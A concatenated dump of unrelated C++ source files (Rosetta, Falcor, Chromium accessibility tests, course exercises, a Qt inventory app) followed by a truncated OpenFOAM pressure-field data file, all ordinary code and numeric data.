/// usually, by a PackerTaskFactory right after the task's construction
/// @author Andrew Leaver-Fay (leaverfa@email.unc.edu)
// only generalized base classes go here. TaskOperations that actually do things do not belong here.
#ifndef INCLUDED_core_pack_task_operation_TaskOperation_hh
#define INCLUDED_core_pack_task_operation_TaskOperation_hh
// Unit Headers
#include <core/pack/task/operation/TaskOperation.fwd.hh>
// VC++ will not compile if these are forward declaration headers
// Project Headers
#include <core/pose/Pose.fwd.hh>
#include <core/pack/task/PackerTask.fwd.hh>
// Basic headers
#include <basic/datacache/DataMap.fwd.hh>
// Utility Headers
#include <utility/tag/Tag.fwd.hh>
#include <utility/pointer/ReferenceCount.hh>
#include <utility/vector1.hh>
namespace core {
namespace pack {
namespace task {
namespace operation {
class TaskOperation : public utility::pointer::ReferenceCount
{
public:
typedef utility::tag::TagCOP TagCOP;
typedef basic::datacache::DataMap DataMap;
typedef pose::Pose Pose;
public:
virtual ~TaskOperation();
/// @brief Create another task operation of the type matching the most-derived
/// version of the class.
virtual TaskOperationOP clone() const = 0;
/// @brief Change a packer task in some way. The input pose is the one to which the input
/// task will be later applied.
virtual void apply( Pose const &, PackerTask & ) const = 0;
/// @brief Used to parse an xml-like tag to load parameters and properties.
virtual void parse_tag( TagCOP, DataMap & );
};
// do not add any derived classes to this file, unless they are generalized abstract base classes and do not actually 'do any work'
} //namespace operation
} //namespace task
} //namespace pack
} //namespace core
#endif
|
fb22f6426c6a6faad50246d327478ce66d347478 | 7a65d5c65b4dfda116a95520dc2b992e0c70730a | /Source/Falcor/Utils/Algorithm/ComputeParallelReduction.h | ab923c2b022f28fb9f62871a958ff2df9684d094 | [
"LicenseRef-scancode-unknown-license-reference"
] | permissive | WeakKnight/Falcor | bd40129d40141ed1360960e3567188a587193989 | a824b847ba9a6861d011868c0a4f4f0b378b821f | refs/heads/master | 2023-03-19T04:41:56.538202 | 2022-09-05T09:45:28 | 2022-09-05T09:45:28 | 297,922,220 | 0 | 0 | BSD-3-Clause | 2020-09-23T09:39:35 | 2020-09-23T09:39:35 | null | UTF-8 | C++ | false | false | 4,895 | h | ComputeParallelReduction.h | /***************************************************************************
# Copyright (c) 2015-22, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**************************************************************************/
#pragma once
#include "Core/Macros.h"
#include "Core/API/Buffer.h"
#include "Core/State/ComputeState.h"
#include "Core/Program/ComputeProgram.h"
#include "Core/Program/ProgramVars.h"
#include <memory>
namespace Falcor
{
/** Class that performs parallel reduction over all pixels in a texture.
The reduction is done on recursively on blocks of n = 1024 elements.
The total number of iterations is ceil(log2(N)/10), where N is the
total number of elements (pixels).
The numerical error for the summation operation lies between pairwise
summation (blocks of size n = 2) and naive running summation.
*/
class FALCOR_API ComputeParallelReduction
{
public:
using SharedPtr = std::shared_ptr<ComputeParallelReduction>;
using SharedConstPtr = std::shared_ptr<const ComputeParallelReduction>;
virtual ~ComputeParallelReduction() = default;
enum class Type
{
Sum,
MinMax,
};
/** Create parallel reduction helper.
\return Created object, or an exception is thrown on failure.
*/
static SharedPtr create();
/** Perform parallel reduction.
The computations are performed in type T, which must be compatible with the texture format:
- float4 for floating-point texture formats (float, snorm, unorm).
- uint4 for unsigned integer texture formats.
- int4 for signed integer texture formats.
For the Sum operation, unused components are set to zero if texture format has < 4 components.
For performance reasons, it is advisable to store the result in a buffer on the GPU,
and then issue an asynchronous readback in user code to avoid a full GPU flush.
The size of the result buffer depends on the executed operation:
- Sum needs 16B
- MinMax needs 32B
\param[in] pRenderContext The render context.
\param[in] pInput Input texture.
\param[in] operation Reduction operation.
\param[out] pResult (Optional) The result of the reduction operation is stored here if non-nullptr. Note that this requires a GPU flush!
\param[out] pResultBuffer (Optional) Buffer on the GPU to which the result is copied (16B or 32B).
\param[out] resultOffset (Optional) Byte offset into pResultBuffer to where the result should be stored.
*/
template<typename T>
void execute(RenderContext* pRenderContext, const Texture::SharedPtr& pInput, Type operation, T* pResult = nullptr, Buffer::SharedPtr pResultBuffer = nullptr, uint64_t resultOffset = 0);
private:
ComputeParallelReduction();
void allocate(uint32_t elementCount, uint32_t elementSize);
ComputeState::SharedPtr mpState;
ComputeProgram::SharedPtr mpInitialProgram;
ComputeProgram::SharedPtr mpFinalProgram;
ComputeVars::SharedPtr mpVars;
Buffer::SharedPtr mpBuffers[2]; ///< Intermediate buffers for reduction iterations.
};
}
|
cd6f2eb5e7d4d5f97c7bdaade10039de5a118fe2 | 77ed2e7f49ff3faa09a0d324ac87a0796a624ad8 | /程序设计与算法「3」/018🏅️第四周程序填空题3( []()的重载 手写二维数组类)/018第四周程序填空题3/main.cpp | 275e9aed916f45f74cad8c109b548af7afdc7e70 | [] | no_license | Haut-Stone/study_Cpp | c02217f5b94d1945b59c27fdbaf7127f0cb0697c | 744cb54a786fd1db0ea0eefa0b8d93f7c81ad019 | refs/heads/master | 2021-01-12T01:40:17.522389 | 2018-01-18T10:47:25 | 2018-01-18T10:47:25 | 78,415,832 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,504 | cpp | main.cpp | //
// main.cpp
// 018第四周程序填空题3
//
// Created by Jack Lee on 14/11/2017.
// Copyright © 2017 SJH. All rights reserved.
//
//这题还是很强的,给块金牌吧,给出老师的解释
/*
用一维数组来存放二维数组
a[i][j]的计算过程从左到右,
a[i] 的返回值是个指针,
指向第 i 行的首地址。
a[i][j] 就会是第 i 行第 j 个元素了。
*/
#include <iostream>
#include <cstring>
using namespace std;
class Array2 {
private:
int* p;
int r, c;
public:
Array2(){p = NULL;};
Array2(int row, int col):r(row), c(col){
p = new int [r*c];
};
//复制构造函数
Array2(Array2& a):r(a.r), c(a.c){
p = new int [r*c];
memcpy(p, a.p, sizeof(int)*r*c);
};
//重载等于号
Array2& operator=(const Array2& a){
if(p){
delete [] p;
}
r = a.r;
c = a.c;
p = new int [r*c];
memcpy(p, a.p, sizeof(int)*r*c);
return *this;
};
//析构时删除空间
~Array2(){
if(p){
delete []p;
}
};
//难点
int* operator[](int i){
return p + i * c;
};
//难点
int& operator()(int i, int j){
return p[i * c + j];
};
};
int main() {
Array2 a(3,4);
int i,j;
for( i = 0;i < 3; ++i )
for( j = 0; j < 4; j ++ )
a[i][j] = i * 4 + j;
for( i = 0;i < 3; ++i ) {
for( j = 0; j < 4; j ++ ) {
cout << a(i,j) << ",";
}
cout << endl;
}
cout << "next" << endl;
Array2 b; b = a;
for( i = 0;i < 3; ++i ) {
for( j = 0; j < 4; j ++ ) {
cout << b[i][j] << ",";
}
cout << endl;
}
return 0;
}
|
eab285f74ee49fc82f1f712d098d0473fd04ed0d | afe175bad079cc13e78a83b0c8f19ba805c12bf2 | /doc/new codes/CppConcurrency/CppConcurrency/V34_parallel_quick_sort.h | 34a44ab127ccbe997dd55167784940ee03b943ee | [] | no_license | MykolaBova/az.cpp.Concurent.1 | 8edba7b49203174ccb6778bb3eb5f5805b555cd1 | a04042efe212ce5303cb1d9c5eea523c758f8757 | refs/heads/master | 2021-10-16T04:32:04.555801 | 2019-02-07T19:27:21 | 2019-02-07T19:27:21 | 169,120,691 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,598 | h | V34_parallel_quick_sort.h | #ifndef V34_PARALLEL_QUICK_SORT
#define V34_PARALLEL_QUICK_SORT
#include <iostream>
#include <list>
#include <algorithm>
#include <future>
template<typename T>
std::list<T> parallel_quick_sort(std::list<T> input)
{
std::cout << std::this_thread::get_id() << std::endl;
if (input.size() < 2)
{
return input;
}
//move frist element in the list to result list and take it as pivot value
std::list<T> result;
result.splice(result.begin(), input, input.begin());
T pivot = *result.begin();
//partition the input array
auto divide_point = std::partition(input.begin(), input.end(), [&](T const & t)
{
return t < pivot;
});
//move lower part of the list to separate list so that we can make recursive call
std::list<T> lower_list;
lower_list.splice(lower_list.end(), input, input.begin(), divide_point);
auto new_lower(parallel_quick_sort(std::move(lower_list)));
//auto new_upper(sequential_quick_sort(std::move(input)));
std::future<std::list<T>> new_upper_future
(std::async(¶llel_quick_sort<T>, std::move(input)));
result.splice(result.begin(), new_lower);
result.splice(result.end(), new_upper_future.get());
return result;
}
void run_code()
{
std::list<int> my_list;
my_list.push_back(8);
my_list.push_back(3);
my_list.push_back(12);
my_list.push_back(9);
my_list.push_back(5);
my_list.push_back(6);
my_list.push_back(11);
my_list.push_back(1);
my_list.push_back(13);
my_list.push_back(2);
auto result = parallel_quick_sort<int>(my_list);
for each (int var in result)
{
std::cout << var << std::endl;
}
}
#endif // !V34_PARALLEL_QUICK_SORT
|
0c89e415fc03d03649f5ecd8c6b6b2999155fd36 | 6035fb168576b8fdbef1a3dbc871e1a06e191278 | /test/07/u2008_518_E_9996605.cpp | 7a57bd88af3b1c1a5932eaf3a440f7deeafbdb98 | [] | no_license | pavellevap/code_antiplagiat | 69ef3ecea5e8e88dfd3b800c0ce351fa32ee9762 | d75603e4e25519d9bb9b9720923136e324328be4 | refs/heads/master | 2021-01-10T05:30:44.560926 | 2015-04-30T14:25:34 | 2015-04-30T14:25:34 | 45,319,257 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,381 | cpp | u2008_518_E_9996605.cpp | #include <bits/stdc++.h>
using namespace std;
FILE *in = stdin;//fopen("f.in", "r");
#define MAXN 111111
int n, k;
bool here[MAXN];
int arr[MAXN];
vector<tuple<int, bool>> fill(vector<tuple<int, bool>> v){
int siz = v.size();
vector<int> pulses;
for(int q = 0; q < siz; q++){
if(get<1>(v[q]) == true){
pulses.push_back(q);
}
}
for(int q = 1; q < pulses.size(); q++){
int ind = pulses[q];
int prevind = pulses[q - 1];
if(get<0>(v[ind]) <= get<0>(v[prevind])){
return vector<tuple<int, bool>>(0);
}
}
if(pulses.size() == 0){
int left = - (siz - 1) / 2;
for(int q = 0; q < siz; q++){
v[q] = make_tuple(left + q, true);
}
return v;
}
for(int q = 0; q < pulses.size(); q++){
int ind = pulses[q];
if(q == 0){
int left = - (ind - 1) / 2;
if(left + ind > get<0>(v[ind])){
left -= left + ind - get<0>(v[ind]);
}
for(int w = 0; w < ind; w++){
v[w] = make_tuple(left + w, true);
}
}
if(q == (int)pulses.size() - 1){
int rem = siz - ind - 1;
int left = - (rem - 1) / 2;
if(left <= get<0>(v[ind])){
left += get<0>(v[ind]) - left + 1;
}
for(int w = ind + 1; w < siz; w++){
v[w] = make_tuple(left + (w - (ind + 1)), true);
}
}
if(q != 0){
int prevind = pulses[q - 1];
int rem = ind - prevind - 1;
int left = - (rem - 1) / 2;
if(rem > get<0>(v[ind]) - get<0>(v[prevind]) - 1){
return vector<tuple<int, bool>>(0);
}
if(left <= get<0>(v[prevind])){
left += get<0>(v[prevind]) - left + 1;
}
if(left + rem > get<0>(v[ind])){
left -= left + rem - get<0>(v[ind]);
}
for(int w = prevind + 1; w < ind; w++){
v[w] = make_tuple(left + w - (prevind + 1), true);
}
}
}
return v;
}
int main(){
fscanf(in, "%d%d\n", &n, &k);
for(int q = 0; q < n; q++){
char inp[111];
fscanf(in, "%s", inp);
if(inp[0] == '?'){
arr[q] = 0;
here[q] = 0;
}
else{
int v;
sscanf(inp, "%d", &v);
arr[q] = v;
here[q] = 1;
}
}
for(int q = 0; q < k; q++){
vector<tuple<int, bool>> v;
for(int w = q; w < n; w += k){
v.push_back(make_tuple(arr[w], here[w]));
}
v = fill(v);
if(v.size() == 0){
printf("Incorrect sequence\n");
return 0;
}
for(int w = q; w < n; w += k){
tie(arr[w], here[w]) = v[w / k];
}
}
for(int q = 0; q < n; q++){
if(q){
printf(" ");
}
printf("%d", arr[q]);
}
printf("\n");
return 0;
} |
d854a146a6084ea650dcc461b6edbd3e1306b4e2 | 619e2eeeaae88bdfbe27ef5b515650e507e13260 | /libraries/parser/optional.hpp | 624c9f51a83794b4d5afddb18bb17fe18501faba | [] | no_license | whztt07/ee-editor | 6b8b0f7fd91c4917409445c6b7e6dd094e6fe3bc | 4d07980152d90eb2a397926c35f80372346b050a | refs/heads/master | 2020-06-17T18:33:33.425030 | 2017-12-12T09:55:05 | 2017-12-12T09:55:05 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 580 | hpp | optional.hpp | #ifndef EE_PARSER_OPTIONAL_HPP
#define EE_PARSER_OPTIONAL_HPP
#if __has_include(<optional>)
#include <optional>
#else
#include <optional/optional.hpp>
namespace std {
using std::experimental::optional;
using std::experimental::nullopt;
using std::experimental::make_optional;
} // namespace std
#endif
namespace ee {
template <class T, class F>
auto map(const std::optional<T>& opt, F&& f) -> std::result_of_t<F(T)> {
if (opt.has_value()) {
return std::forward<F>(f)(opt.value());
}
return std::nullopt;
}
} // namespace ee
#endif // EE_PARSER_OPTIONAL_HPP
|
d9b9e525f2a43ee7a9e85d4d4630837fd6cc59d9 | 6cf9bedae559c9af3c42bb7f85958378adcfa710 | /Uebungen/Modul012_Pointer/Personal.h | 23b9dc8e86aa5c742e862c3d7e164b774a6c00e7 | [] | no_license | ppedvAG/CPlusPlus_Grundkurs_VZ_20210406 | 90c97f1744c75d5eca77b64f2fbd59720eb7173f | 9fbdad6c3083c411e8f9107ad46e6d3d0d3c6309 | refs/heads/main | 2023-04-09T05:13:12.102524 | 2021-04-12T10:11:01 | 2021-04-12T10:11:01 | 355,089,118 | 0 | 0 | null | null | null | null | ISO-8859-1 | C++ | false | false | 568 | h | Personal.h | #include <memory>
#include <iostream>
#include "Artikel.h"
#ifndef PERSONAL_H
#define PERSONAL_H
class Personal
{
int id;
float verkaufssumme;
public:
Personal(int id);
void addSumme(float wert);
float getSumme();
bool verkaufen(std::shared_ptr<Artikel> artikel);
//zufallsanzahl (achtung! an bestand)
//summe des verkaufs der verkaufssumme hinzufuegen
//betand entfernen
//ausgabe
//wer hat was was wie viel für welchen preis verkauft
//rueckgabe
//artikel wurde ausverkauft
~Personal() {
std::cout << "Destruktor" << id<<std::endl;
}
};
#endif
|
a4cdee2da9715925b005c97b707d6c14d9281e2e | 0577a46d8d28e1fd8636893bbdd2b18270bb8eb8 | /chromium/ui/accessibility/test_ax_tree_update.cc | db833fd5ef779c6e5c7700cd90ec66400d91ff31 | [
"BSD-3-Clause"
] | permissive | ric2b/Vivaldi-browser | 388a328b4cb838a4c3822357a5529642f86316a5 | 87244f4ee50062e59667bf8b9ca4d5291b6818d7 | refs/heads/master | 2022-12-21T04:44:13.804535 | 2022-12-17T16:30:35 | 2022-12-17T16:30:35 | 86,637,416 | 166 | 41 | BSD-3-Clause | 2021-03-31T18:49:30 | 2017-03-29T23:09:05 | null | UTF-8 | C++ | false | false | 1,622 | cc | test_ax_tree_update.cc | // Copyright 2022 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/accessibility/test_ax_tree_update.h"
namespace ui {
TestAXTreeUpdateNode::TestAXTreeUpdateNode(const TestAXTreeUpdateNode&) =
default;
TestAXTreeUpdateNode::TestAXTreeUpdateNode(TestAXTreeUpdateNode&&) = default;
TestAXTreeUpdateNode::~TestAXTreeUpdateNode() = default;
TestAXTreeUpdateNode::TestAXTreeUpdateNode(
ax::mojom::Role role,
const std::vector<TestAXTreeUpdateNode>& children)
: children(children) {
DCHECK_NE(role, ax::mojom::Role::kUnknown);
data.role = role;
}
TestAXTreeUpdateNode::TestAXTreeUpdateNode(
ax::mojom::Role role,
ax::mojom::State state,
const std::vector<TestAXTreeUpdateNode>& children)
: children(children) {
DCHECK_NE(role, ax::mojom::Role::kUnknown);
DCHECK_NE(state, ax::mojom::State::kNone);
data.role = role;
data.AddState(state);
}
TestAXTreeUpdateNode::TestAXTreeUpdateNode(const std::string& text) {
data.role = ax::mojom::Role::kStaticText;
data.SetName(text);
}
TestAXTreeUpdate::TestAXTreeUpdate(const TestAXTreeUpdateNode& root) {
root_id = SetSubtree(root);
}
AXNodeID TestAXTreeUpdate::SetSubtree(const TestAXTreeUpdateNode& node) {
size_t node_index = nodes.size();
nodes.push_back(node.data);
nodes[node_index].id = node_index + 1;
std::vector<AXNodeID> child_ids;
for (const auto& child : node.children) {
child_ids.push_back(SetSubtree(child));
}
nodes[node_index].child_ids = child_ids;
return nodes[node_index].id;
}
} // namespace ui
|
5d5bb8ebafd214e655ab892d50dcbc340359c48c | 8b2bf4ff1d1423bc2b1f792bb2ff63b2d8b0ddec | /jewelrySystem_JJ/jewelrygoodsfiles.cpp | 8579fb28d6dfdc025fbb88e294c6a927469f678e | [] | no_license | bighome/Jewelry_System | b338496a11b3f5259c84709a8a19dcd9de5ca2f1 | cb1f826a54a987d33a7e4c92a8766258854a9500 | refs/heads/master | 2021-01-22T20:34:41.448217 | 2012-10-22T08:36:26 | 2012-10-22T08:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,514 | cpp | jewelrygoodsfiles.cpp | #include "jewelrygoodsfiles.h"
#include "jewelrygoodsfilesadd.h"
#include "CommodityInfo.h"
jewelryGoodsFiles::jewelryGoodsFiles(QWidget *parent)
{
ui.setupUi(this);
updateUIFromDatabase();
}
jewelryGoodsFiles::~jewelryGoodsFiles()
{
}
void jewelryGoodsFiles::on_pbAdd_clicked()
{
jewelryGoodsFilesAdd add(this);
if (add.exec())
{
updateUIFromDatabase();
}
}
void jewelryGoodsFiles::on_pbEdit_clicked()
{
int row = ui.tableWidget->currentRow();
if (row >= 0)
{
jewelryGoodsFilesAdd add(this , ui.tableWidget->item(row , TABLEITEM_id)->text());
if (add.exec())
{
updateUIFromDatabase();
}
}
}
void jewelryGoodsFiles::on_pbQuit_clicked()
{
close();
}
void jewelryGoodsFiles::updateUIFromDatabase()
{
CommodityInfo& commodityInfo = CommodityInfo::getInstance();
QMap<QString , CommodityInfo::CommodityInfoItem>& commodityInfoItemMap = commodityInfo.getCommodityInfoItemMap();
ui.tableWidget->setRowCount(commodityInfoItemMap.count());
int row = 0;
for (QMap<QString , CommodityInfo::CommodityInfoItem>::iterator i = commodityInfoItemMap.begin() ; i != commodityInfoItemMap.end() ; i++ , row++)
{
CommodityInfo::CommodityInfoItem& commodityInfoItem = *i;
QTableWidgetItem* tableItem = NULL;
{
tableItem = new QTableWidgetItem(commodityInfoItem.m_id);
ui.tableWidget->setItem(row , TABLEITEM_id , tableItem);
}
{
tableItem = new QTableWidgetItem(commodityInfoItem.m_commodityType);
ui.tableWidget->setItem(row , TABLEITEM_commodityType , tableItem);
}
{
tableItem = new QTableWidgetItem(commodityInfoItem.m_commodityName);
ui.tableWidget->setItem(row , TABLEITEM_commodityName , tableItem);
}
{
tableItem = new QTableWidgetItem(commodityInfoItem.m_commodityUnit);
ui.tableWidget->setItem(row , TABLEITEM_commodityUnit , tableItem);
}
{
tableItem = new QTableWidgetItem(QString::number(commodityInfoItem.m_commodityPrice , 'f' , 4));
ui.tableWidget->setItem(row , TABLEITEM_commodityPrice , tableItem);
}
{
tableItem = new QTableWidgetItem(QString::number(commodityInfoItem.m_commodityDiscounts , 'f' , 4));
ui.tableWidget->setItem(row , TABLEITEM_commodityDiscounts , tableItem);
}
}
}
void jewelryGoodsFiles::on_pbDelete_clicked()
{
int row = ui.tableWidget->currentRow();
if (row >= 0)
{
QString commodityID = ui.tableWidget->item(row , TABLEITEM_id)->text();
CommodityInfo& commodityInfo = CommodityInfo::getInstance();
if (commodityInfo.deleteItem(commodityID))
{
updateUIFromDatabase();
}
}
} |
b47d66ac38368342a4e9f09e3a99d1087a9fb3ad | 50910683749e0461f2b48a4aa291e470d637fd8d | /controlBox/ControlBoxConsolePT/main.cpp | 921010fe57e160216a4017d540f45634d6c45b9c | [] | no_license | simachewh/climateChamber | cb00b98be0d8842c09691acab108a675bd1c7f49 | de805c362949646b794cf5ea5a1e9041593ecd55 | refs/heads/master | 2021-01-22T12:07:57.066673 | 2015-06-23T08:39:44 | 2015-06-23T08:39:44 | 35,157,202 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 255 | cpp | main.cpp | #include <QCoreApplication>
#include <intro.h>
int main(int argc, char *argv[])
{
QCoreApplication a(argc, argv);
Intro intro;
intro.opPort();
//qDebug() << "Entetr control box port name:";
//intro.wrToPort();
return a.exec();
}
|
97c78e990d8762976f2debf00defefacdd3a5c0f | 53d2985473acb411be443f6b9818ab06a4dc34ac | /kEpsilon_pimpleFoam_snappyPipe/200/p | b2047a7802497d5629872e619cc1efe6b42b0c7e | [] | no_license | saatt/thin_pipeflow_snappyHexMesh | 35bc332347dcc16cccc700563ab3cb0f7e64a6c3 | 223b61121e23b3b757d38efd845a0186f3c1ad12 | refs/heads/master | 2022-04-19T05:37:23.467819 | 2020-04-01T04:15:18 | 2020-04-01T04:15:18 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,930,371 | p | /*--------------------------------*- C++ -*----------------------------------*\
| ========= | |
| \\ / F ield | OpenFOAM: The Open Source CFD Toolbox |
| \\ / O peration | Version: v1906 |
| \\ / A nd | Web: www.OpenFOAM.com |
| \\/ M anipulation | |
\*---------------------------------------------------------------------------*/
FoamFile
{
version 2.0;
format ascii;
class volScalarField;
location "200";
object p;
}
// * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * //
dimensions [0 2 -2 0 0 0 0];
internalField nonuniform List<scalar>
171728
(
0.00165475
0.00165634
0.00165634
0.00165475
0.00165634
0.00165634
0.00165633
0.00165634
0.00165475
0.00165634
0.00165634
0.00165475
0.00165637
0.00165636
0.00165636
0.00165636
0.00165413
0.00165414
0.00165414
0.00165414
0.00166721
0.00165414
0.00165415
0.00166721
0.00165414
0.00166722
0.00165415
0.00166713
0.0016542
0.00165636
0.00166518
0.00165428
0.00166713
0.00166515
0.0016542
0.00165636
0.00166717
0.00166517
0.00165428
0.00165413
0.00166722
0.00166672
0.00165414
0.00165414
0.00166722
0.00166722
0.00165413
0.00166722
0.00165414
0.00165416
0.00165421
0.00165635
0.00165428
0.00165414
0.00165415
0.00165636
0.0016542
0.00165427
0.00166713
0.00166515
0.0016542
0.00165635
0.00166717
0.00166517
0.00165428
0.00166721
0.00165414
0.00166722
0.00165415
0.00166713
0.00166515
0.00165636
0.0016542
0.00166517
0.00166717
0.00165427
0.00166721
0.00165413
0.00166722
0.00165415
0.00165413
0.00165414
0.00165414
0.00165413
0.00166713
0.00165635
0.0016542
0.00166517
0.00165428
0.00166713
0.00166515
0.00165635
0.0016542
0.00166517
0.00166717
0.00165428
0.00166722
0.00165414
0.00165416
0.00166721
0.00165414
0.00166722
0.00165415
0.00166672
0.00165414
0.00165414
0.00166722
0.00166722
0.00165413
0.00166722
0.00165413
0.00166723
0.00165841
0.00165842
0.00165839
0.00165421
0.00165841
0.00165414
0.00165841
0.00165836
0.00165417
0.00165839
0.00165423
0.00165842
0.00165414
0.00165841
0.00165837
0.00165418
0.00165843
0.00165413
0.00165413
0.00165842
0.00165842
0.00165412
0.00166293
0.00166722
0.00166721
0.00166296
0.00166723
0.00166294
0.00166295
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00165841
0.0016584
0.00165413
0.00165415
0.00165841
0.0016584
0.00165413
0.00166293
0.00166722
0.00166721
0.00166295
0.00166723
0.00166294
0.00166295
0.00165842
0.0016584
0.00165413
0.00165842
0.00165413
0.00166293
0.00166723
0.00166294
0.00166723
0.00166293
0.00165841
0.0016584
0.00165413
0.00165414
0.00165841
0.0016584
0.00165413
0.00165841
0.00166294
0.00166293
0.00166723
0.00166723
0.00166724
0.00166294
0.00166294
0.00165839
0.00165422
0.00165841
0.00165414
0.00165836
0.00165841
0.00165417
0.00165839
0.00165422
0.00165841
0.00165414
0.00165841
0.00165836
0.00165417
0.00166298
0.00166722
0.00166717
0.00166295
0.00166302
0.0016672
0.00166295
0.00166298
0.00166722
0.00166717
0.00166295
0.0016672
0.00166295
0.00166302
0.00165843
0.00165413
0.00165413
0.00165842
0.00165842
0.00165412
0.00165841
0.00166294
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00165842
0.00165841
0.00165415
0.00165413
0.00165841
0.00165842
0.00165413
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00165842
0.00165841
0.00165413
0.00165415
0.00165842
0.00165841
0.00165413
0.00166294
0.00166722
0.00166723
0.00166296
0.00166723
0.00166295
0.00166294
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00166294
0.00166723
0.00166295
0.00166723
0.00166294
0.00165842
0.0016584
0.00165415
0.00165413
0.00165841
0.00165842
0.00165413
0.00166293
0.00166723
0.00166721
0.00166296
0.00166723
0.00166294
0.00166295
0.00165841
0.0016584
0.00165413
0.00165841
0.00165413
0.00166293
0.00166723
0.00166294
0.00166723
0.00166293
0.00165841
0.0016584
0.00165413
0.00165414
0.00165841
0.0016584
0.00165413
0.00165841
0.00165839
0.00165422
0.00165842
0.00165414
0.00165837
0.00165841
0.00165417
0.00165839
0.00165421
0.00165841
0.00165414
0.00165841
0.00165837
0.00165417
0.00165843
0.00165413
0.00165413
0.00165843
0.00165842
0.00165412
0.00165841
0.00166294
0.00166722
0.00166723
0.00166296
0.00166723
0.00166296
0.00166294
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00166294
0.00166294
0.00165842
0.00165841
0.00165415
0.00165413
0.00165841
0.00165842
0.00165413
0.00166294
0.00166722
0.00166723
0.00166296
0.00166723
0.00166296
0.00166294
0.00165842
0.00165841
0.00165413
0.00165842
0.00165413
0.00166294
0.00166723
0.00166295
0.00166723
0.00166294
0.00165842
0.00165841
0.00165415
0.00165413
0.00165841
0.00165842
0.00165413
0.00166293
0.00166723
0.00166723
0.00166724
0.00166293
0.00166294
0.00165839
0.00165421
0.00165841
0.00165414
0.00165836
0.00165841
0.00165417
0.00165839
0.00165421
0.00165841
0.00165414
0.00165836
0.00165841
0.00165417
0.00166298
0.00166722
0.00166717
0.00166295
0.0016672
0.00166302
0.00166295
0.00166298
0.00166722
0.00166718
0.00166295
0.0016672
0.00166302
0.00166295
0.00165842
0.00165412
0.00165412
0.00165842
0.00165842
0.00165412
0.00165841
0.00166294
0.00165841
0.00166294
0.00165828
0.00165792
0.00165448
0.0016545
0.00165814
0.00165814
0.00165432
0.00165828
0.00165791
0.00165449
0.00165449
0.00165813
0.00165814
0.00165432
0.00165828
0.00165791
0.00165449
0.00165449
0.00165814
0.00165814
0.00165432
0.00165828
0.00165791
0.00165449
0.00165449
0.00165813
0.00165814
0.00165431
0.00165636
0.00165636
0.00166518
0.00166518
0.00165636
0.00166518
0.00165636
0.00165636
0.00166518
0.00166518
0.00166518
0.00165636
0.00165636
0.00165636
0.00166518
0.00166518
0.00165636
0.00166518
0.00165636
0.00165636
0.00166518
0.00166518
0.00166518
0.00165636
0.0016633
0.00166713
0.00166694
0.00166308
0.00166693
0.00166307
0.0016633
0.00165815
0.00165435
0.00165836
0.00165424
0.00165822
0.00165834
0.00165446
0.00165811
0.00165831
0.00165426
0.0016545
0.00165832
0.00165812
0.00165449
0.0016633
0.00166713
0.00166694
0.00166308
0.00166693
0.00166307
0.00166331
0.00165815
0.00165435
0.00165836
0.00165424
0.00165834
0.00165822
0.00165446
0.00166327
0.00166714
0.00166703
0.00166301
0.00166696
0.00166305
0.00166316
0.00165811
0.00165832
0.00165427
0.0016545
0.00165832
0.00165813
0.0016545
0.00166313
0.00166356
0.00166694
0.00166695
0.00166329
0.00166709
0.0016633
0.00165815
0.00165436
0.00165837
0.00165425
0.00165824
0.00165835
0.00165446
0.00165812
0.00165833
0.00165427
0.0016545
0.00165833
0.00165813
0.00165449
0.00165815
0.00165435
0.00165836
0.00165424
0.00165834
0.00165823
0.00165446
0.00165812
0.00165833
0.0016545
0.00165426
0.00165813
0.00165832
0.00165449
0.0016633
0.00166713
0.00166693
0.00166308
0.00166692
0.00166307
0.0016633
0.00165815
0.00165435
0.00165836
0.00165425
0.00165822
0.00165834
0.00165446
0.00166327
0.00166715
0.00166703
0.00166301
0.00166696
0.00166316
0.00166305
0.00165811
0.00165831
0.00165427
0.0016545
0.00165832
0.00165812
0.00165449
0.0016633
0.00166693
0.00166713
0.00166308
0.00166693
0.0016633
0.00166307
0.00165815
0.00165435
0.00165836
0.00165424
0.00165834
0.00165822
0.00165446
0.00166327
0.00166714
0.00166703
0.00166301
0.00166696
0.00166305
0.00166316
0.00165811
0.00165831
0.0016545
0.00165426
0.00165812
0.00165832
0.00165449
0.0016633
0.00166694
0.00166714
0.00166309
